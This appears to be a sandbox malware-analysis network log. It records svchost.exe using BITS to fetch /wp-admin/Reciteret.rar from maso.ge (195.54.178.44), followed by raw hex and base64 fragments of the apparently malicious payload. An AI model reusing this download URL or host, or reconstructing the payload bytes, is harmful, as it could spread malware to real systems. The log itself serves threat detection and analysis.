                                                        2024-03-18 07:08:16 UTC8000INData Raw: d5 85 db 8e 25 52 c7 0c 2a 6f 8b 37 ba 33 33 d3 09 9d 04 81 bd cc 5c be 0a 5c 9e 0b 8a 1a 77 da 96 f0 c5 ca 9e 10 0f 6b 4f 60 fc be c5 28 17 6f 15 9f ed 5f 2c a2 11 1f 99 b4 75 2d 9d a8 10 26 f2 53 d7 08 0e 1e 55 e9 f9 bd 6e f4 8b 4c bd 8a b0 02 a9 6f 6e b7 e0 23 0e c4 1d 94 78 2a 4a a3 d4 be bf a1 94 70 e2 3c de a4 19 e3 4a 9d fc 8d bf d6 79 3b e2 ce 9a a2 aa fa 1f f5 52 c0 f8 37 70 cf 4f d2 cf e2 a6 d8 ab c5 5f a0 6b 38 a5 f3 20 d2 a2 d2 d2 50 da b8 e9 56 f2 9a 90 9e 30 ee e1 5e d9 df 03 d5 73 28 3b 10 b5 18 83 9e e6 39 86 ec e8 07 90 7a 52 4f d1 20 4c dd 0f 3c 41 38 63 e8 6f 9e 66 39 14 c8 c5 8a 97 e5 44 2f 5c 8e a9 50 20 90 4f 28 a8 96 ae 9b a4 3d 68 2a f5 36 83 84 ac 3f bb 03 8b ea 73 a3 28 ef 08 7d b6 7c 8a 2d 67 6d 04 48 15 91 21 bb 4d dc 4f b9 f2
                                                        Data Ascii: %R*o733\\wkO`(o_,u-&SUnLon#x*Jp<Jy;R7pO_k8 PV0^s(;9zRO L<A8cof9D/\P O(=h*6?s(}|-gmH!MO
                                                        2024-03-18 07:08:16 UTC8000INData Raw: 18 33 86 7f a5 de ba ca 9f 81 26 5b ba 36 88 f0 17 c0 bc 51 a1 1b c9 c1 f4 43 8e af aa 19 e4 67 e9 26 71 34 99 d5 cb e8 9e d4 57 ee 3a 34 cf 70 39 ac 74 73 9c 66 cd 79 ba 2f 17 05 b6 bb 17 3e d8 6b b0 d5 23 e7 0e ed 43 f1 57 ec 3a be 23 25 7e ee 7c 34 9b a8 b0 4e 6f 58 61 5c 41 1e 23 62 01 8d 02 e0 25 56 ff 49 80 d1 da cb 68 06 a2 9d a0 a4 84 7d 0b 70 38 10 e2 9f cd ca 24 03 66 ca 68 d3 fb db 8f c9 72 e3 02 62 7b a7 10 5b 0b f0 ee fa 93 80 f6 77 4f 91 ee a6 2b 03 57 eb d9 84 75 8f c0 27 62 fc 83 25 a0 92 00 f6 0f 8c bc ed 49 45 2c d6 db f1 74 f3 27 36 6f 79 29 0d 4d e2 8b 98 95 58 50 70 2b fb 3e 70 b7 0d 30 a3 91 0d e4 76 f4 c0 63 11 7e 01 22 f8 1d 36 ea c3 c3 6e 9e b0 ad 91 c0 3f 5d a8 58 ec 79 ba 92 42 4e 23 1f 87 4a d1 bc a6 03 74 58 79 ca 15 3e c1 91
                                                        Data Ascii: 3&[6QCg&q4W:4p9tsfy/>k#CW:#%~|4NoXa\A#b%VIh}p8$fhrb{[wO+Wu'b%IE,t'6oy)MXPp+>p0vc~"6n?]XyBN#JtXy>
                                                        2024-03-18 07:08:16 UTC8000INData Raw: 9a 89 e5 dc 85 2c ca 07 53 30 d3 33 9f ea 74 31 fb 2a 71 66 ef 8c 9b d2 b2 77 d9 be 6b ac 42 b1 63 d8 f6 fb f6 79 a5 58 51 4a 41 dc 3d 35 1a 58 e4 4b 52 7e dc 73 03 ed 90 56 b5 85 8b be d2 13 29 2b a9 78 ce 81 4c 4c 1c 3f 4d 63 b2 65 76 fe 0a c3 47 0a d0 83 13 56 f5 14 90 59 b3 aa 49 24 02 df 9e 6c bf 42 01 f9 71 56 7e f1 d2 04 cd bd a2 41 f9 fe d7 65 da 13 d7 f3 e1 da 5f 2f df 13 4e 7b b7 93 79 fa 23 84 45 95 8a b2 51 da 00 1b 5d 7a 96 6a ed 5c 32 b0 8c 22 e4 95 aa e1 de 4c 19 21 0a 69 74 eb 03 f0 17 4f 5f 9f c2 0b a6 b1 e9 66 24 d1 e4 2a 13 a8 c8 19 5c dd 8e 3b 10 da db 3f 96 8c 45 fc 51 db ce 0e be 4b 6e f1 04 50 f2 eb e6 11 87 72 5f 7e e6 da d5 da a0 57 15 e9 fb 78 cb 10 5e 38 a2 db 63 05 e4 20 f7 4e 59 53 95 77 4d 3c 4b 96 4a 1a 4c e1 62 d0 7a c7 1c
                                                        Data Ascii: ,S03t1*qfwkBcyXQJA=5XKR~sV)+xLL?McevGVYI$lBqV~Ae_/N{y#EQ]zj\2"L!itO_f$*\;?EQKnPr_~Wx^8c NYSwM<KJLbz
                                                        2024-03-18 07:08:16 UTC8000INData Raw: f3 2e ed c2 65 f8 45 9b dd f1 d6 28 6f bf 7c 8b bd c3 05 c0 0d db 3d 39 d9 6c 82 85 bb 77 ff 80 ad 4f fe b7 b9 c6 7e 67 fc a7 da 98 5b 63 85 fd 6f 16 01 8b c7 20 5e 89 e2 22 91 b3 ee c1 7a a2 7f 7e 2b e4 45 ca 95 89 41 ab 3e 07 d7 43 95 09 2a 46 a8 7a 2b 47 a2 c2 1b 98 3e 0f bd 1b e8 bf ee 2e ee 50 ab 35 54 89 be 80 00 ee 89 48 8f 9a 3b 4a 7b 74 4c 1f 3f a1 61 0a 65 03 c0 7c 1c fd 7d 45 60 56 40 93 0c 1f 45 d2 62 7d 71 9e 20 e3 65 da af 5a 47 cf 99 c9 9f 26 e8 01 5c fc 86 fd 54 eb ed 11 c8 fe 31 2e 32 4a 9c 91 d8 a5 7e 53 7f ee 0c 2e 07 a0 f1 d1 8f 20 12 e7 d5 b2 59 f7 99 6e 4f 8b 08 e5 76 ec ec fd a0 24 0c 83 60 65 16 c8 2e dd bd 58 e9 e9 07 e2 75 95 87 cb ce 62 b7 14 79 87 61 ef 3c 0f 52 88 d7 13 12 08 95 dd 8c 11 e6 36 9d 93 f8 c6 06 75 c7 5f 1b 3c 64
                                                        Data Ascii: .eE(o|=9lwO~g[co ^"z~+EA>C*Fz+G>.P5TH;J{tL?ae|}E`V@Eb}q eZG&\T1.2J~S. YnOv$`e.Xubya<R6u_<d
                                                        2024-03-18 07:08:16 UTC8000INData Raw: 8d 51 e6 2a 83 52 ce cb 7f d1 c3 57 d5 57 bb 72 e3 14 14 9b d6 33 f7 19 f3 6f f3 74 43 b6 26 0b 32 18 89 2b b6 c6 7e ba 8c 98 a6 f7 c0 38 7b 3d 77 7f d4 dc 7f 13 e9 c7 1b dc 8c 63 74 74 ff 99 c6 c3 59 41 54 c7 7c f0 03 26 b1 f5 5b 88 b3 48 a2 b3 d3 cf 57 94 a1 08 23 dc ba 8c 19 e0 b5 a2 af de 0a 56 c1 f0 59 3f e0 82 dd 45 c5 bd aa 7a e3 a7 28 ed 06 08 aa 8d 80 2a f5 ff f2 ea ad 07 29 64 17 39 e6 b4 99 5a a7 ed c5 22 78 ab a8 c6 71 db 2a a3 1d 30 52 4a 10 82 db b0 3e 06 b6 0d 63 53 1e 2e 1e e0 b0 f6 a4 79 a0 59 1f 9e 48 b5 8c 3c 42 19 3a c3 d1 2a 87 27 30 36 65 6b 72 47 33 38 0d 5e dc 89 67 62 85 06 5a ab 56 c9 23 87 c2 40 76 e2 51 9f 4a 00 04 bd 9b d4 bb bf bf 6a 8c b8 49 3a cc 34 24 c9 cf 2e af af 91 e5 28 20 d1 a6 89 ca ac 20 39 74 fa 0b 0a 71 5b ad 8a
                                                        Data Ascii: Q*RWWr3otC&2+~8{=wcttYAT|&[HW#VY?Ez(*)d9Z"xq*0RJ>cS.yYH<B:*'06ekrG38^gbZV#@vQJjI:4$.( 9tq[


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.549748195.54.178.44434568C:\Windows\System32\svchost.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-03-18 07:08:28 UTC152OUTHEAD /wp-admin/Reciteret.rar HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept: */*
                                                        Accept-Encoding: identity
                                                        User-Agent: Microsoft BITS/7.8
                                                        Host: maso.ge
                                                        2024-03-18 07:08:29 UTC227INHTTP/1.1 200 OK
                                                        Date: Mon, 18 Mar 2024 07:08:28 GMT
                                                        Server: Apache
                                                        Last-Modified: Mon, 18 Mar 2024 01:22:31 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 429872
                                                        Connection: close
                                                        Content-Type: application/x-rar-compressed


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.549749195.54.178.44434568C:\Windows\System32\svchost.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-03-18 07:08:29 UTC203OUTGET /wp-admin/Reciteret.rar HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept: */*
                                                        Accept-Encoding: identity
                                                        If-Unmodified-Since: Mon, 18 Mar 2024 01:22:31 GMT
                                                        User-Agent: Microsoft BITS/7.8
                                                        Host: maso.ge
                                                        2024-03-18 07:08:30 UTC227INHTTP/1.1 200 OK
                                                        Date: Mon, 18 Mar 2024 07:08:29 GMT
                                                        Server: Apache
                                                        Last-Modified: Mon, 18 Mar 2024 01:22:31 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 429872
                                                        Connection: close
                                                        Content-Type: application/x-rar-compressed
                                                        2024-03-18 07:08:30 UTC7965INData Raw: 63 51 47 62 36 77 4c 2f 6d 4c 73 35 6e 52 73 41 63 51 47 62 63 51 47 62 41 31 77 6b 42 48 45 42 6d 2b 73 43 66 79 79 35 37 57 6f 66 56 58 45 42 6d 2b 73 43 4c 77 57 42 38 62 7a 68 2f 6d 48 72 41 67 6d 58 63 51 47 62 67 63 47 76 64 42 37 4c 36 77 49 41 5a 2b 73 43 51 53 62 72 41 6f 37 51 63 51 47 62 75 6d 41 68 42 77 78 78 41 5a 76 72 41 6d 6e 36 63 51 47 62 63 51 47 62 4d 63 72 72 41 6a 44 66 36 77 4a 6a 52 6f 6b 55 43 33 45 42 6d 33 45 42 6d 39 48 69 36 77 4c 6f 33 58 45 42 6d 34 50 42 42 48 45 42 6d 33 45 42 6d 34 48 35 68 32 56 6e 42 48 7a 4e 63 51 47 62 36 77 4b 6e 63 34 74 45 4a 41 52 78 41 5a 74 78 41 5a 75 4a 77 33 45 42 6d 2b 73 43 73 79 6d 42 77 7a 50 56 6e 67 4c 72 41 75 6d 4f 63 51 47 62 75 6a 76 32 51 77 44 72 41 74 4e 77 63 51 47 62 67 66 4b
                                                        Data Ascii: cQGb6wL/mLs5nRsAcQGbcQGbA1wkBHEBm+sCfyy57WofVXEBm+sCLwWB8bzh/mHrAgmXcQGbgcGvdB7L6wIAZ+sCQSbrAo7QcQGbumAhBwxxAZvrAmn6cQGbcQGbMcrrAjDf6wJjRokUC3EBm3EBm9Hi6wLo3XEBm4PBBHEBm3EBm4H5h2VnBHzNcQGb6wKnc4tEJARxAZtxAZuJw3EBm+sCsymBwzPVngLrAumOcQGbujv2QwDrAtNwcQGbgfK
                                                        2024-03-18 07:08:30 UTC8000INData Raw: 59 76 6e 58 6a 41 66 50 79 45 7a 69 6f 4d 30 6f 57 79 55 76 4e 5a 5a 66 61 2f 77 47 6f 4b 67 38 65 31 6d 6f 50 45 73 44 54 38 71 54 42 7a 68 6a 64 4c 61 78 55 74 30 43 71 75 4c 6e 5a 33 4a 32 68 79 2b 69 35 79 46 6b 4c 51 46 62 71 33 4d 42 72 38 30 47 6d 4d 75 57 4b 46 77 48 78 50 50 56 51 6a 6e 55 75 32 32 6a 69 64 77 48 77 4d 6c 47 73 62 6e 59 6b 44 33 41 52 64 34 37 2b 76 58 2b 67 46 43 66 53 4d 71 6c 57 57 41 72 4f 34 47 34 41 2f 49 31 2f 4c 38 34 37 79 72 5a 76 4d 73 38 4f 31 6d 62 4a 65 70 79 56 74 36 4e 41 4d 53 71 41 6b 76 4d 62 51 32 4e 73 68 50 71 79 50 48 50 53 49 67 48 72 54 64 73 64 4b 35 77 36 75 50 41 6c 50 52 6e 55 6e 78 47 45 4c 58 6d 71 4a 5a 37 65 2b 64 30 79 52 43 66 6d 31 74 2f 75 78 58 7a 77 4c 6e 6c 4e 55 43 51 63 69 71 62 46 4b 45
                                                        Data Ascii: YvnXjAfPyEzioM0oWyUvNZZfa/wGoKg8e1moPEsDT8qTBzhjdLaxUt0CquLnZ3J2hy+i5yFkLQFbq3MBr80GmMuWKFwHxPPVQjnUu22jidwHwMlGsbnYkD3ARd47+vX+gFCfSMqlWWArO4G4A/I1/L847yrZvMs8O1mbJepyVt6NAMSqAkvMbQ2NshPqyPHPSIgHrTdsdK5w6uPAlPRnUnxGELXmqJZ7e+d0yRCfm1t/uxXzwLnlNUCQciqbFKE
                                                        2024-03-18 07:08:30 UTC8000INData Raw: 32 33 4c 69 6e 6a 6c 43 37 73 4e 57 51 73 55 6c 38 65 6a 67 6d 62 39 73 4c 59 34 51 44 42 38 48 69 79 4c 66 78 79 77 31 73 54 37 78 41 64 43 77 54 53 38 59 32 76 61 4d 4f 4d 73 53 31 65 56 2b 37 45 2b 4b 32 52 39 5a 36 44 78 49 54 6b 62 57 64 61 47 49 45 4e 6b 56 31 59 66 36 52 35 4c 43 73 65 39 61 37 74 59 47 38 68 45 61 50 37 69 44 5a 67 4f 30 78 4f 59 65 43 48 46 79 53 35 32 44 30 52 70 6f 54 4e 2b 5a 71 44 78 37 57 61 67 4e 6a 7a 63 6e 31 59 42 67 49 70 79 45 33 32 61 58 41 67 65 68 38 4d 35 4f 71 6a 76 4d 57 68 69 76 33 4d 43 4d 67 73 77 31 47 76 77 34 4f 65 55 31 64 53 31 46 73 6c 73 59 6f 51 50 39 61 54 51 6d 65 32 34 71 49 6f 68 45 62 73 7a 65 6f 30 64 4f 53 4e 2f 58 6c 41 46 65 31 75 59 73 6b 75 46 58 38 61 71 62 78 63 46 6a 71 58 46 6a 6e 6a 51
                                                        Data Ascii: 23LinjlC7sNWQsUl8ejgmb9sLY4QDB8HiyLfxyw1sT7xAdCwTS8Y2vaMOMsS1eV+7E+K2R9Z6DxITkbWdaGIENkV1Yf6R5LCse9a7tYG8hEaP7iDZgO0xOYeCHFyS52D0RpoTN+ZqDx7WagNjzcn1YBgIpyE32aXAgeh8M5OqjvMWhiv3MCMgsw1Gvw4OeU1dS1FslsYoQP9aTQme24qIohEbszeo0dOSN/XlAFe1uYskuFX8aqbxcFjqXFjnjQ
                                                        2024-03-18 07:08:30 UTC8000INData Raw: 59 54 55 43 71 5a 42 4a 4e 33 43 6a 45 35 69 6a 6b 45 50 46 58 77 42 37 53 30 4a 37 57 61 67 53 7a 46 43 67 6a 77 46 6d 46 76 79 37 54 51 61 73 48 64 75 74 33 41 66 4e 30 2f 33 67 65 64 53 55 6b 4e 76 6e 48 41 48 73 49 51 77 6a 4f 64 69 30 71 66 66 75 71 5a 78 37 30 66 77 2b 76 76 47 64 43 30 5a 72 4a 53 54 77 35 6d 55 52 59 4f 32 46 52 73 4a 6d 49 54 56 6d 50 2f 4a 4e 44 77 70 64 4f 31 6e 6f 50 47 39 33 74 6e 49 37 55 4f 6c 69 6a 6e 78 69 39 77 5a 61 6a 69 68 76 2f 6f 70 45 2b 78 6b 50 5a 64 6f 6e 74 33 5a 2f 6e 4b 42 54 43 76 79 49 36 38 74 77 6f 64 39 58 37 47 37 4c 6d 51 53 61 72 46 78 67 73 45 6e 66 78 6a 4f 6c 64 6b 6a 32 67 49 74 45 61 47 6a 66 4a 56 78 4b 62 37 6a 61 71 74 70 6d 2f 6a 2b 37 58 52 33 38 65 31 6d 6f 50 48 74 71 4f 46 6b 4c 73 31 69
                                                        Data Ascii: YTUCqZBJN3CjE5ijkEPFXwB7S0J7WagSzFCgjwFmFvy7TQasHdut3AfN0/3gedSUkNvnHAHsIQwjOdi0qffuqZx70fw+vvGdC0ZrJSTw5mURYO2FRsJmITVmP/JNDwpdO1noPG93tnI7UOlijnxi9wZajihv/opE+xkPZdont3Z/nKBTCvyI68twod9X7G7LmQSarFxgsEnfxjOldkj2gItEaGjfJVxKb7jaqtpm/j+7XR38e1moPHtqOFkLs1i
                                                        2024-03-18 07:08:30 UTC8000INData Raw: 31 45 51 76 4e 32 72 41 4a 6b 36 73 35 46 69 58 6a 6e 48 2b 71 36 46 79 67 31 6e 5a 4b 6f 51 53 67 31 65 77 36 76 44 70 6e 77 4d 72 72 41 4d 57 52 7a 6f 69 36 41 71 65 39 64 77 77 55 4a 71 45 36 6d 54 78 76 34 71 56 61 44 78 37 57 61 67 38 53 6e 41 6a 57 6a 55 59 4b 30 66 6d 44 36 63 33 72 42 45 46 73 32 4f 4f 64 55 41 71 4f 66 79 45 52 68 43 63 72 56 41 4a 55 74 69 33 51 43 57 52 48 7a 6e 6c 4e 56 38 64 75 72 6f 34 6d 61 33 6e 2b 31 6d 6f 50 48 74 5a 6e 73 47 73 30 64 55 64 4d 78 56 61 56 53 4d 73 46 56 4b 79 67 6c 44 31 4a 4a 6c 41 69 78 37 69 7a 52 70 41 44 39 49 57 4b 57 74 41 57 42 62 56 6a 47 63 62 45 71 45 6e 6a 64 39 4c 54 32 37 31 51 31 44 4c 30 78 39 4c 74 43 6b 31 43 6e 31 5a 54 6a 72 76 55 68 6f 2b 78 4b 42 4a 66 31 57 6a 67 4b 4b 51 72 63 49
                                                        Data Ascii: 1EQvN2rAJk6s5FiXjnH+q6Fyg1nZKoQSg1ew6vDpnwMrrAMWRzoi6Aqe9dwwUJqE6mTxv4qVaDx7Wag8SnAjWjUYK0fmD6c3rBEFs2OOdUAqOfyERhCcrVAJUti3QCWRHznlNV8duro4ma3n+1moPHtZnsGs0dUdMxVaVSMsFVKyglD1JJlAix7izRpAD9IWKWtAWBbVjGcbEqEnjd9LT271Q1DL0x9LtCk1Cn1ZTjrvUho+xKBJf1WjgKKQrcI
                                                        2024-03-18 07:08:30 UTC8000INData Raw: 68 63 2b 69 2f 5a 6b 72 44 62 49 4c 7a 34 68 43 75 6a 47 39 39 75 7a 6a 73 61 68 37 32 62 78 53 48 2b 76 49 72 5a 73 6c 37 71 36 58 51 34 68 4d 48 4a 51 62 69 46 6b 64 38 6d 50 41 7a 35 2f 42 6c 38 32 61 6f 74 55 44 31 68 31 45 53 70 72 63 58 79 67 49 39 31 36 37 6b 75 57 54 76 64 4e 66 72 45 2f 4b 66 4c 69 5a 37 4e 4e 37 57 61 67 38 65 31 6d 55 43 4f 54 73 58 4d 48 7a 37 5a 49 50 36 6d 56 56 6e 5a 78 4f 6d 4f 6e 55 33 6f 4b 56 6c 44 6e 56 68 79 75 69 4c 4a 77 4b 34 44 73 52 37 33 76 70 6a 61 44 6b 70 47 31 36 32 30 73 42 2b 57 71 6a 35 4a 6f 4d 51 6b 64 52 4e 43 33 6f 30 6d 34 45 4c 73 64 43 66 36 6d 55 74 6a 55 62 74 62 6e 56 36 4e 62 59 4d 46 77 4b 6e 4b 65 6c 30 67 77 50 48 67 4c 62 35 35 73 31 61 62 63 37 46 65 47 6d 72 47 39 67 76 66 31 49 44 2f 62
                                                        Data Ascii: hc+i/ZkrDbILz4hCujG99uzjsah72bxSH+vIrZsl7q6XQ4hMHJQbiFkd8mPAz5/Bl82aotUD1h1ESprcXygI9167kuWTvdNfrE/KfLiZ7NN7Wag8e1mUCOTsXMHz7ZIP6mVVnZxOmOnU3oKVlDnVhyuiLJwK4DsR73vpjaDkpG1620sB+Wqj5JoMQkdRNC3o0m4ELsdCf6mUtjUbtbnV6NbYMFwKnKel0gwPHgLb55s1abc7FeGmrG9gvf1ID/b
                                                        2024-03-18 07:08:30 UTC8000INData Raw: 4d 6f 78 79 5a 5a 34 51 51 79 53 56 70 37 50 48 64 34 33 4b 33 7a 79 5a 4b 44 78 45 68 4f 45 6f 46 52 52 74 34 44 76 35 32 48 4a 61 6c 35 58 63 42 77 55 6d 4c 6d 7a 35 31 46 4f 6e 51 78 45 63 43 77 34 69 6f 56 52 4e 54 78 34 44 6d 65 72 62 49 74 66 5a 34 37 79 72 32 77 4b 55 73 2b 76 74 54 75 72 4e 37 58 72 77 75 52 35 2b 44 4e 38 78 52 4f 6b 49 4e 37 4d 31 55 74 53 61 4c 53 6b 64 62 6b 79 6e 66 6b 74 58 33 71 71 62 4a 67 55 77 73 34 64 2b 5a 6d 66 66 71 67 57 34 6d 64 54 67 75 31 6d 6f 50 48 74 5a 6d 4d 50 61 65 58 6e 53 74 4b 35 54 54 75 53 37 53 54 39 58 52 44 63 4c 64 39 6b 6b 37 35 61 46 72 75 33 65 6f 70 30 33 6d 78 4b 68 4d 67 69 34 57 76 2b 37 48 6e 52 38 65 31 6d 6f 50 48 74 6f 61 74 44 69 65 7a 65 53 4f 6b 6d 6b 39 58 47 6e 30 56 38 47 52 7a 39
                                                        Data Ascii: MoxyZZ4QQySVp7PHd43K3zyZKDxEhOEoFRRt4Dv52HJal5XcBwUmLmz51FOnQxEcCw4ioVRNTx4DmerbItfZ47yr2wKUs+vtTurN7XrwuR5+DN8xROkIN7M1UtSaLSkdbkynfktX3qqbJgUws4d+ZmffqgW4mdTgu1moPHtZmMPaeXnStK5TTuS7ST9XRDcLd9kk75aFru3eop03mxKhMgi4Wv+7HnR8e1moPHtoatDiezeSOkmk9XGn0V8GRz9
                                                        2024-03-18 07:08:30 UTC8000INData Raw: 6b 35 72 71 2f 35 69 67 33 50 79 37 54 6e 2b 44 6c 69 65 6f 50 48 74 6a 68 70 73 37 6d 59 72 64 42 56 6d 6f 50 47 39 33 76 47 47 36 6c 32 56 63 69 4b 32 51 4d 51 71 37 47 4f 79 36 49 31 75 47 6f 6f 77 50 48 67 4c 5a 36 5a 73 31 4b 6e 51 36 44 77 46 56 42 65 6d 65 64 75 71 4a 69 65 6e 73 6f 58 2b 74 42 6c 54 51 59 34 74 53 76 46 31 47 2b 4b 71 30 76 59 30 65 38 62 49 50 44 67 68 6a 4a 47 38 66 2f 48 74 61 53 32 43 48 4a 6c 66 71 65 79 75 5a 76 45 78 71 75 66 54 2f 67 77 32 64 44 72 43 43 44 30 76 67 68 53 65 6f 32 57 64 71 52 59 34 78 61 44 4f 39 2b 43 62 77 67 67 6b 57 36 54 4d 69 67 41 51 43 6d 43 49 62 56 5a 33 70 6c 4a 58 64 6e 33 6c 35 31 64 66 44 74 4c 2b 63 43 72 6c 49 5a 38 66 35 31 66 54 57 38 44 6f 70 33 48 76 52 76 6a 54 2b 79 55 34 6b 33 76 52
                                                        Data Ascii: k5rq/5ig3Py7Tn+DlieoPHtjhps7mYrdBVmoPG93vGG6l2VciK2QMQq7GOy6I1uGoowPHgLZ6Zs1KnQ6DwFVBemeduqJiensoX+tBlTQY4tSvF1G+Kq0vY0e8bIPDghjJG8f/HtaS2CHJlfqeyuZvExqufT/gw2dDrCCD0vghSeo2WdqRY4xaDO9+CbwggkW6TMigAQCmCIbVZ3plJXdn3l51dfDtL+cCrlIZ8f51fTW8Dop3HvRvjT+yU4k3vR
                                                        2024-03-18 07:08:30 UTC8000INData Raw: 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62
                                                        Data Ascii: ABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABb
                                                        2024-03-18 07:08:30 UTC8000INData Raw: 6c 55 41 36 50 6c 31 58 6b 66 30 52 50 72 36 2f 4d 43 4b 4e 7a 30 54 58 33 44 45 79 69 73 32 56 37 33 65 30 66 48 74 5a 70 32 56 72 41 65 47 2f 6d 43 44 42 50 4c 74 50 71 45 79 5a 75 4d 61 38 4f 31 6d 78 73 67 38 6f 61 4f 58 39 55 2b 39 79 43 66 6e 6b 39 38 68 57 4d 5a 77 33 71 58 57 64 63 6e 6e 6f 35 53 2f 39 47 6b 47 4b 7a 6e 57 6b 65 44 76 46 62 54 76 5a 71 42 50 2b 48 4c 2f 51 47 79 51 58 70 52 32 42 79 51 4f 62 4a 41 52 6f 68 35 47 78 67 59 76 66 6c 75 58 61 4c 77 68 48 37 74 45 6c 77 46 74 6e 4d 7a 77 48 75 30 56 74 4f 39 6d 6f 41 63 75 6b 4a 6b 7a 61 59 42 6e 38 6d 52 4b 45 6d 6a 56 74 53 48 43 69 51 6d 57 36 47 77 62 33 44 67 77 5a 71 44 2b 59 44 4e 69 44 68 49 41 4a 54 4a 73 54 62 79 69 69 39 69 59 4f 6d 78 56 38 41 7a 62 56 43 55 6a 5a 4e 4d 4e
                                                        Data Ascii: lUA6Pl1Xkf0RPr6/MCKNz0TX3DEyis2V73e0fHtZp2VrAeG/mCDBPLtPqEyZuMa8O1mxsg8oaOX9U+9yCfnk98hWMZw3qXWdcnno5S/9GkGKznWkeDvFbTvZqBP+HL/QGyQXpR2ByQObJARoh5GxgYvfluXaLwhH7tElwFtnMzwHu0VtO9moAcukJkzaYBn8mRKEmjVtSHCiQmW6Gwb3DgwZqD+YDNiDhIAJTJsTbyii9iYOmxV8AzbVCUjZNMN


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.549752195.54.178.44434568C:\Windows\System32\svchost.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-03-18 07:08:38 UTC152OUTHEAD /wp-admin/Reciteret.rar HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept: */*
                                                        Accept-Encoding: identity
                                                        User-Agent: Microsoft BITS/7.8
                                                        Host: maso.ge
                                                        2024-03-18 07:08:38 UTC227INHTTP/1.1 200 OK
                                                        Date: Mon, 18 Mar 2024 07:08:38 GMT
                                                        Server: Apache
                                                        Last-Modified: Mon, 18 Mar 2024 01:22:31 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 429872
                                                        Connection: close
                                                        Content-Type: application/x-rar-compressed


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.549753195.54.178.44434568C:\Windows\System32\svchost.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-03-18 07:08:39 UTC203OUTGET /wp-admin/Reciteret.rar HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept: */*
                                                        Accept-Encoding: identity
                                                        If-Unmodified-Since: Mon, 18 Mar 2024 01:22:31 GMT
                                                        User-Agent: Microsoft BITS/7.8
                                                        Host: maso.ge
                                                        2024-03-18 07:08:39 UTC227INHTTP/1.1 200 OK
                                                        Date: Mon, 18 Mar 2024 07:08:39 GMT
                                                        Server: Apache
                                                        Last-Modified: Mon, 18 Mar 2024 01:22:31 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 429872
                                                        Connection: close
                                                        Content-Type: application/x-rar-compressed
                                                        2024-03-18 07:08:39 UTC7965INData Raw: 63 51 47 62 36 77 4c 2f 6d 4c 73 35 6e 52 73 41 63 51 47 62 63 51 47 62 41 31 77 6b 42 48 45 42 6d 2b 73 43 66 79 79 35 37 57 6f 66 56 58 45 42 6d 2b 73 43 4c 77 57 42 38 62 7a 68 2f 6d 48 72 41 67 6d 58 63 51 47 62 67 63 47 76 64 42 37 4c 36 77 49 41 5a 2b 73 43 51 53 62 72 41 6f 37 51 63 51 47 62 75 6d 41 68 42 77 78 78 41 5a 76 72 41 6d 6e 36 63 51 47 62 63 51 47 62 4d 63 72 72 41 6a 44 66 36 77 4a 6a 52 6f 6b 55 43 33 45 42 6d 33 45 42 6d 39 48 69 36 77 4c 6f 33 58 45 42 6d 34 50 42 42 48 45 42 6d 33 45 42 6d 34 48 35 68 32 56 6e 42 48 7a 4e 63 51 47 62 36 77 4b 6e 63 34 74 45 4a 41 52 78 41 5a 74 78 41 5a 75 4a 77 33 45 42 6d 2b 73 43 73 79 6d 42 77 7a 50 56 6e 67 4c 72 41 75 6d 4f 63 51 47 62 75 6a 76 32 51 77 44 72 41 74 4e 77 63 51 47 62 67 66 4b
                                                        Data Ascii: cQGb6wL/mLs5nRsAcQGbcQGbA1wkBHEBm+sCfyy57WofVXEBm+sCLwWB8bzh/mHrAgmXcQGbgcGvdB7L6wIAZ+sCQSbrAo7QcQGbumAhBwxxAZvrAmn6cQGbcQGbMcrrAjDf6wJjRokUC3EBm3EBm9Hi6wLo3XEBm4PBBHEBm3EBm4H5h2VnBHzNcQGb6wKnc4tEJARxAZtxAZuJw3EBm+sCsymBwzPVngLrAumOcQGbujv2QwDrAtNwcQGbgfK
